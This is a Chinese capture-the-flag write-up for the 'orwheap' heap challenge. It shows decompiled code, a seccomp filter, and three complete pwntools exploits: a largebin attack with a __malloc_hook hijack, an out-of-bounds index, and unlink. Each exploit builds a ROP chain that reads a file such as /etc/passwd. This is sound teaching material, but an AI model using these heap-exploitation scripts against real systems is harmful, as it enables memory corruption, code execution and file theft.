

首页枪战射击After Attack更新时间:2024-07-30




[*] '/home/kira/pwn/wdb/orwheap' Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x400000)



line CODE JT JF K ================================= 0000: 0x20 0x00 0x00 0x00000004 A = arch 0001: 0x15 0x00 0x06 0xc000003e if (A != ARCH_X86_64) goto 0008 0002: 0x20 0x00 0x00 0x00000000 A = sys_number 0003: 0x35 0x02 0x01 0x40000000 if (A >= 0x40000000) goto 0006 else goto 0005 0004: 0x15 0x00 0x03 0xffffffff if (A != 4294967295) goto 0008 0005: 0x15 0x02 0x00 0x00000002 if (A == open) goto 0008 0006: 0x15 0x01 0x00 0x0000003b if (A == execve) goto 0008 0007: 0x06 0x00 0x00 0x7fff0000 return ALLOW 0008: 0x06 0x00 0x00 0x00000000 return KILL


1:add 2:free 3:edit 4:exit 5:show Your Choice:


__int64 __usercall add@<rax>(__int64 a1@<rbp>) { __int64 result; // rax unsigned int size; // [rsp-18h] [rbp-18h] unsigned int idx; // [rsp-14h] [rbp-14h] __int64 v4; // [rsp-10h] [rbp-10h] __int64 v5; // [rsp-8h] [rbp-8h] __asm { endbr64 } v5 = a1; printf_("index>> "); idx = get_int((__int64)&v5); if ( idx <= 19 ) { if ( qword_4040E8[2 * idx] ) { puts_("index is uesed"); result = 0LL; } else { printf_("size>> "); size = get_int((__int64)&v5); v4 = calloc_((char *)1, (char *)size); if ( !v4 ) exit_(0xFFFFFFFFLL, size); qword_4040E8[2 * idx] = v4; *((_DWORD *)&unk_4040E0 4 * idx) = size; printf_("name>> "); read_(0LL, v4, size - 1); // size - 1 = 超大数 result = 0LL; } ... }


__int64 __usercall delete@<rax>(__int64 a1@<rbp>) { unsigned int v2; // [rsp-Ch] [rbp-Ch] __int64 v3; // [rsp-8h] [rbp-8h] __asm { endbr64 } v3 = a1; printf_("index>> "); v2 = get_int((__int64)&v3); if ( qword_4040E8[2 * v2] && dword_404080 ) { free_((char *)qword_4040E8[2 * v2]); --dword_404080; } return 0LL; }


__int64 __usercall edit@<rax>(__int64 a1@<rbp>) { unsigned int v1; // eax __int64 result; // rax unsigned int v3; // [rsp-Ch] [rbp-Ch] __int64 v4; // [rsp-8h] [rbp-8h] __asm { endbr64 } v4 = a1; printf_("index>> "); v1 = get_int((__int64)&v4); v3 = v1; result = qword_4040E8[2 * v1]; if ( result ) { printf_("name>> "); result = read_(0LL, qword_4040E8[2 * v3], *((signed int *)&unk_4040E0 4 * v3)); } return result; }


__int64 __usercall show@<rax>(__int64 a1@<rbp>) { __int64 result; // rax unsigned int v2; // [rsp-Ch] [rbp-Ch] __int64 v3; // [rsp-8h] [rbp-8h] __asm { endbr64 } v3 = a1; printf_("index>> "); v2 = get_int((__int64)&v3); if ( qword_4040E8[2 * v2] ) result = puts_(qword_4040E8[2 * v2]); else result = puts_("idx error"); return result; }


解法一:largebin attack

largebin attack 可以向指定地址写一个大数,那么可以利用这个特性向dword_404080写入一个大数,以此解除delete两次的限制。largebin attack 需要泄露libc地址以及heap地址,并可以覆盖bk_nextsize字段,题目有UAF漏洞,所有条件都可以满足。

需要注意的是,题目使用了libc2.31,加入了对largebin的保护,导致以前的largebin attack攻击手法无法使用。

libc2.31绕过方式可以参考how2heap ,见:https://github.com/shellphish/how2heap/blob/master/glibc_2.31/large_bin_attack.c

#include<stdio.h> #include<stdlib.h> #include<assert.h> /* A revisit to large bin attack for after glibc2.30 Relevant code snippet : if ((unsigned long) (size) < (unsigned long) chunksize_nomask (bck->bk)){ fwd = bck; bck = bck->bk; victim->fd_nextsize = fwd->fd; victim->bk_nextsize = fwd->fd->bk_nextsize; fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim; } */ int main(){ /*Disable IO buffering to prevent stream from interfering with heap*/ setvbuf(stdin,NULL,_IONBF,0); setvbuf(stdout,NULL,_IONBF,0); setvbuf(stderr,NULL,_IONBF,0); printf("\n\n"); printf("Since glibc2.30, two new checks have been enforced on large bin chunk insertion\n\n"); printf("Check 1 : \n"); printf("> if (__glibc_unlikely (fwd->bk_nextsize->fd_nextsize != fwd))\n"); printf("> malloc_printerr (\"malloc(): largebin double linked list corrupted (nextsize)\");\n"); printf("Check 2 : \n"); printf("> if (bck->fd != fwd)\n"); printf("> malloc_printerr (\"malloc(): largebin double linked list corrupted (bk)\");\n\n"); printf("This prevents the traditional large bin attack\n"); printf("However, there is still one possible path to trigger large bin attack. The PoC is shown below : \n\n"); printf("====================================================================\n\n"); size_t target = 0; printf("Here is the target we want to overwrite (%p) : %lu\n\n",&target,target); size_t *p1 = malloc(0x428); printf("First, we allocate a large chunk [p1] (%p)\n",p1-2); size_t *g1 = malloc(0x18); printf("And another chunk to prevent consolidate\n"); printf("\n"); size_t *p2 = malloc(0x418); printf("We also allocate a second large chunk [p2] (%p).\n",p2-2); printf("This chunk should be smaller than [p1] and belong to the same large bin.\n"); size_t *g2 = malloc(0x18); printf("Once again, allocate a guard chunk to prevent consolidate\n"); printf("\n"); free(p1); printf("Free the larger of the two --> [p1] (%p)\n",p1-2); size_t *g3 = malloc(0x438); printf("Allocate a chunk larger than [p1] to insert [p1] into large bin\n"); printf("\n"); free(p2); printf("Free the smaller of the two --> [p2] (%p)\n",p2-2); printf("At this point, we have one chunk in large bin [p1] (%p),\n",p1-2); printf(" and one chunk in unsorted bin [p2] (%p)\n",p2-2); printf("\n"); p1[3] = (size_t)((&target)-4); printf("Now modify the p1->bk_nextsize to [target-0x20] (%p)\n",(&target)-4); printf("\n"); size_t *g4 = malloc(0x438); printf("Finally, allocate another chunk larger than [p2] (%p) to place [p2] (%p) into large bin\n", p2-2, p2-2); printf("Since glibc does not check chunk->bk_nextsize if the new inserted chunk is smaller than smallest,\n"); printf(" the modified p1->bk_nextsize does not trigger any error\n"); printf("Upon inserting [p2] (%p) into largebin, [p1](%p)->bk_nextsize->fd->nexsize is overwritten to address of [p2] (%p)\n", p2-2, p1-2, p2-2); printf("\n"); printf("In out case here, target is now overwritten to address of [p2] (%p), [target] (%p)\n", p2-2, (void *)target); printf("Target (%p) : %p\n",&target,(size_t*)target); printf("\n"); printf("====================================================================\n\n"); assert((size_t)(p2-2) == target); return 0; }


# largebin attack add(0, 0x428, '0') # p1 add(1, 0x68, '1' * 8) # g1 add(2, 0x418, '2' * 8) # p2 add(3, 0x18, '3' * 8) # g2 delete(0) # p1 add(4, 0x438, '4' * 8) # g3 delete(2) # p2 edit(0, flat(0, 0, 0, 0x404080 - 0x20)) # p1->bk_nextsize add(5, 0x438, '5' * 8) # g4


解除delete限制后即可进行double free等操作。如果本题申请内存用的malloc,直接tcache dup即可。不过这题使用的calloc,不会取tcache,那么可以考虑用fastbin attack劫持malloc_hook。


.text:00000000004013BA xchg rsp, rdi .text:00000000004013BD nop .text:00000000004013BE pop rbp .text:00000000004013BF retn



rop = flat( # openat(0,'/flag',0,0) libc.address 0x000000000004a550, # pop rax; ret; 0x101, libc.address 0x0000000000026b72, # pop rdi; ret; 0, libc.address 0x0000000000027529, # pop rsi; ret; heap 0x6b8, libc.address 0x000000000011c371, # pop rdx; pop r12; ret; 0, 0, libc.address 0x0000000000066229, # syscall; ret; # read(3,buf,0x100) libc.address 0x000000000004a550, # pop rax; ret; 0, libc.address 0x0000000000026b72, # pop rdi; ret; 3, libc.address 0x0000000000027529, # pop rsi; ret; heap, libc.address 0x000000000011c371, # pop rdx; pop r12; ret; 0x100, 0, libc.address 0x0000000000066229, # syscall; ret; # write(1,buf,0x100) libc.address 0x000000000004a550, # pop rax; ret; 1, libc.address 0x0000000000026b72, # pop rdi; ret; 1, libc.address 0x0000000000027529, # pop rsi; ret; heap, libc.address 0x000000000011c371, # pop rdx; pop r12; ret; 0x100, 0, libc.address 0x0000000000066229, # syscall; ret; )




from pwn import * target = 'orwheap' context.binary = './' target p = process('./' target) libc = elf.libc def add(idx, size, name): p.sendlineafter("Choice:\n", "1") p.sendlineafter("index>> ", str(idx)) p.sendlineafter("size>> ", str(size)) p.sendafter("name>> ", name) def delete(idx): p.sendlineafter("Choice:\n", "2") p.sendlineafter("index>> ", str(idx)) def edit(idx, name): p.sendlineafter("Choice:\n", "3") p.sendlineafter("index>> ", str(idx)) p.sendafter("name>> ", name) def show(idx): p.sendlineafter("Choice:\n", "5") p.sendlineafter("index>> ", str(idx)) # largebin attack add(0, 0x428, '0') # p1 add(1, 0x68, '1' * 8) # g1 add(11, 0x68, '1' * 8) add(12, 0x68, '1' * 8) add(13, 0x68, '1' * 8) add(14, 0x68, '1' * 8) add(15, 0x68, '1' * 8) add(16, 0x68, '1' * 8) add(17, 0x68, '1' * 8) add(2, 0x418, '2' * 8) # p2 add(3, 0x18, '3' * 8) # g2 delete(0) # p1 add(4, 0x438, '4' * 8) # g3 delete(2) # p2 edit(0, flat(0, 0, 0, 0x404080 - 0x20)) add(5, 0x438, '5' * 8) # g4 # leak libc address add(6, 0x500, '6' * 8) add(7, 0x500, '7' * 8) delete(6) show(6) libc.address = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00')) - libc.sym['__malloc_hook'] - 96 - 0x10 success(hex(libc.address)) # tcache delete(1) delete(11) delete(12) delete(13) delete(14) delete(15) delete(16) # fastbin delete(17) show(0) heap = u64(p.recvuntil('\n', drop=True).ljust(8,'\x00')) - 0xa40 success(hex(heap)) rop = flat( # openat(0,'/flag',0,0) libc.address 0x000000000004a550, # pop rax; ret; 0x101, libc.address 0x0000000000026b72, # pop rdi; ret; 0, libc.address 0x0000000000027529, # pop rsi; ret; heap 0x6b8, libc.address 0x000000000011c371, # pop rdx; pop r12; ret; 0, 0, libc.address 0x0000000000066229, # syscall; ret; # read(3,buf,0x100) libc.address 0x000000000004a550, # pop rax; ret; 0, libc.address 0x0000000000026b72, # pop rdi; ret; 3, libc.address 0x0000000000027529, # pop rsi; ret; heap, libc.address 0x000000000011c371, # pop rdx; pop r12; ret; 0x100, 0, libc.address 0x0000000000066229, # syscall; ret; # write(1,buf,0x100) libc.address 0x000000000004a550, # pop rax; ret; 1, libc.address 0x0000000000026b72, # pop rdi; ret; 1, libc.address 0x0000000000027529, # pop rsi; ret; heap, libc.address 0x000000000011c371, # pop rdx; pop r12; ret; 0x100, 0, libc.address 0x0000000000066229, # syscall; ret; ) rop = rop.ljust(0x418, "\x00") rop = "/etc/passwd\x00" edit(0, rop) # fastbin attack edit(17, flat(libc.sym['__malloc_hook'] - 0x23 - 0x10)) add(8, 0x68, '0') add(9, 0x68, flat('\x00' * 35, 0x00000000004013ba))# xchg rdi, rsp; nop; pop rbp; ret;)) p.sendlineafter("Choice:\n", "1") p.sendlineafter("index>> ", str(18)) p.sendlineafter("size>> ", str(heap 0x2a0 - 8)) p.interactive() 解法二:数组越界


由于程序没有开启PIE,那么可以直接在heap上构造p64(size) p64(got_addr)这个结构,然后越界即可泄露libc地址。

偏移index可以通过 (目标地址 - list地址) 整除 16 进行计算。






list_addr = 0x4040E0 add(0,0x68,'0') add(1,0x68,'1') delete(1) delete(0) # leak heap address show(0) heap = u64(p.recvuntil('\n', drop=True).ljust(8,'\x00')) - 0x310 success(hex(heap)) # leak libc address edit(0, flat(8,elf.got['printf'])) show((heap 0x2a0-list_addr)//16) libc.address = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00')) - libc.sym['printf'] success(hex(libc.address)) # leak stack address edit(0,flat(8,libc.sym['environ'])) show((heap 0x2a0-list_addr)//16) ret_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00')) - 0x120 edit(0,flat(0x400,ret_addr) '/etc/passwd\x00') rop = flat( # openat(0,'/flag',0,0) libc.address 0x000000000004a550, # pop rax; ret; 0x101, libc.address 0x0000000000026b72, # pop rdi; ret; 0, libc.address 0x0000000000027529, # pop rsi; ret; heap 0x2b0, libc.address 0x000000000011c371, # pop rdx; pop r12; ret; 0, 0, libc.address 0x0000000000066229, # syscall; ret; # read(3,buf,0x100) libc.address 0x000000000004a550, # pop rax; ret; 0, libc.address 0x0000000000026b72, # pop rdi; ret; 3, libc.address 0x0000000000027529, # pop rsi; ret; heap, libc.address 0x000000000011c371, # pop rdx; pop r12; ret; 0x100, 0, libc.address 0x0000000000066229, # syscall; ret; # write(1,buf,0x100) libc.address 0x000000000004a550, # pop rax; ret; 1, libc.address 0x0000000000026b72, # pop rdi; ret; 1, libc.address 0x0000000000027529, # pop rsi; ret; heap, libc.address 0x000000000011c371, # pop rdx; pop r12; ret; 0x100, 0, libc.address 0x0000000000066229, # syscall; ret; ) edit((heap 0x2a0-list_addr)//16,rop) p.interactive()



最后一种方法为unlink,libc2.31下unlink方法构造跟之前的版本差别不大。关键点仍是溢出修改chunk的size位最低。以及构造一个绕过double linked检查的fake chunk。

构造fake chunk有几点需要注意:

  1. 由于2.31有tcache,构造unsorted bin时要申请大于0x408的chunk。
  2. calloc(0)会申请0x20大小的空间,由于calloc不会取tcache,因此需要从unsorted bin分配空间,才能向下覆盖下一个chunk的size。
  3. 触发unlink时,last remainder要为空,不然在__int_free时会出现报错。因此这里我通过先申请一块chunk,让last remainder剩下0x20,然后calloc(0)时把last remainder用完。


chunk0 = 0x4040E8 add(0,0x428,'0') add(1,0x428,'1') add(2,0x18,'2') delete(0) payload = flat( 0, 0x421, chunk0 - 0x18, chunk0 - 0x10 # fd = ptr0 - 0x18, bk = ptr0 - 0x10 ) add(3,0x408,payload) add(4,0,flat(0,0,0x420,0x430)) delete(1)


pwndbg> x/150gx 0x17e5290 0x17e5290: 0x0000000000000000 0x0000000000000411 0x17e52a0: 0x0000000000000000 0x0000000000000421 <-- fake chunk 0x17e52b0: 0x00000000004040d0 0x00000000004040d8 0x17e52c0: 0x0000000000000000 0x0000000000000000 0x17e52d0: 0x0000000000000000 0x0000000000000000 ... 0x17e56a0: 0x0000000000000000 0x0000000000000021 0x17e56b0: 0x0000000000000000 0x0000000000000000 0x17e56c0: 0x0000000000000420 0x0000000000000430 <-- chunk1 0x17e56d0: 0x0000000000000031 0x0000000000000000 0x17e56e0: 0x0000000000000000 0x0000000000000000




chunk0 = 0x4040E8 add(0,0x428,'0') add(1,0x428,'1') add(2,0x18,'2') delete(0) payload = flat( 0, 0x421, chunk0 - 0x18, chunk0 - 0x10 # fd = ptr0 - 0x18, bk = ptr0 - 0x10 ) add(3,0x408,payload) add(4,0,flat(0,0,0x420,0x430)) delete(1) # leak libc address edit(0,flat(0,0,0x428,0x4040d0,0x8,elf.got['printf'])) show(1) libc.address = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00')) - libc.sym['printf'] success(hex(libc.address)) # leak stack address edit(0,flat(0,0,0x428,0x4040d0,0x8,libc.sym['environ'])) show(1) ret_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00')) - 0x120 # rop edit(0,flat(0,0,0x428,0x4040d0,0x400,ret_addr,'/etc/passwd\x00')) rop = flat( # openat(0,'/flag',0,0) libc.address 0x000000000004a550, # pop rax; ret; 0x101, libc.address 0x0000000000026b72, # pop rdi; ret; 0, libc.address 0x0000000000027529, # pop rsi; ret; chunk0 0x18, libc.address 0x000000000011c371, # pop rdx; pop r12; ret; 0, 0, libc.address 0x0000000000066229, # syscall; ret; # read(3,buf,0x100) libc.address 0x000000000004a550, # pop rax; ret; 0, libc.address 0x0000000000026b72, # pop rdi; ret; 3, libc.address 0x0000000000027529, # pop rsi; ret; chunk0, libc.address 0x000000000011c371, # pop rdx; pop r12; ret; 0x100, 0, libc.address 0x0000000000066229, # syscall; ret; # write(1,buf,0x100) libc.address 0x000000000004a550, # pop rax; ret; 1, libc.address 0x0000000000026b72, # pop rdi; ret; 1, libc.address 0x0000000000027529, # pop rsi; ret; chunk0, libc.address 0x000000000011c371, # pop rdx; pop r12; ret; 0x100, 0, libc.address 0x0000000000066229, # syscall; ret; ) edit(1,rop) p.interactive() 总结



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